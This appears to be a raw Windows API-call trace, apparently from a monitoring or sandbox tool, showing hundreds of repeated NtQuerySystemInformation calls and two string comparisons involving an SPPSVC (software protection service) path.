[0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0226.867] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0226.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0226.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0226.875] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0226.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0226.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0226.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0226.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0226.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x50, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x50, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x50, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0226.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0226.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0226.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0226.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0226.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0226.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] 